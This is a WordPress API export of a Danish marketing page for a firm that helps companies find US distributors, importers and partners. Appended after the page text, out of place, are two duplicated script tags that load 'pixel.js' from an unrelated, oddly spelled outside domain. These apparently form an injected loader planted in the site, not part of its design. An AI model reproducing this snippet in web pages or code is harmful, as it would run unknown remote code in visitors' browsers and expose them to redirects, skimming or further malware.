{"id":3138,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-04T12:11:54","modified_gmt":"2014-09-04T16:11:54","slug":"sogning-af-amerikanske-distributorer-importor-grossister-og-partnere","status":"publish","type":"page","link":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/","title":{"rendered":"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere."},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-ad2a31207a087d8c6bd8b494b2c30c2e\">\n#top .av-special-heading.av-av_heading-ad2a31207a087d8c6bd8b494b2c30c2e{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-ad2a31207a087d8c6bd8b494b2c30c2e .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-ad2a31207a087d8c6bd8b494b2c30c2e .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-ad2a31207a087d8c6bd8b494b2c30c2e av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere.<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-6bbb9745c24ef102d1f3feabac50c46d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>M\u00e5ske er du en virksomhed med et meget kompleks og teknisk produktsortiment, eller m\u00e5ske kr\u00e6ver din efter salgs aktiviteter mere lokaliseret st\u00f8tte &#8230; der er mange grunde til, at samarbejde med velrenommerede amerikanske distribut\u00f8rer, import\u00f8r, grossister eller anden form for partner.<\/p>\n<p>Operationer med et st\u00e6rkt salgs mekanisme og personale, der forst\u00e5r det givent marked, er sommetider den eneste m\u00e5de at komme ind p\u00e5 markedet i USA p\u00e5.<\/p>\n<p>American Agent er ideelt placeret til at hj\u00e6lpe dig.\u00a0 Vores m\u00e5l er at positionere dig p\u00e5 den st\u00e6rkest mulige m\u00e5de over for potentielle samarbejdspartner i USA, vi kan etablere langvarige forretnings forbindelser mellem dig og velrenommerede amerikanske selskaber.<\/p>\n<p>Projektets varighed kan variere afh\u00e6ngigt af din specifikke situation.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3138","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/\" \/>\n<meta property=\"og:locale\" content=\"da_DK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-04T16:11:54+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\\\/\",\"name\":\"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-04T16:11:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\\\/#breadcrumb\"},\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/da\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"da-DK\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/","og_locale":"da_DK","og_type":"article","og_title":"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-04T16:11:54+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/","url":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/","name":"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere. - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/da\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-04T16:11:54+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/#breadcrumb"},"inLanguage":"da-DK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/da\/sogning-af-amerikanske-distributorer-importor-grossister-og-partnere\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/da\/"},{"@type":"ListItem","position":2,"name":"S\u00f8gning af Amerikanske Distribut\u00f8rer, Import\u00f8r, Grossister og Partnere."}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/da\/#website","url":"https:\/\/americanagent.com\/da\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/da\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"da-DK"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3138","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/comments?post=3138"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3138\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/media?parent=3138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}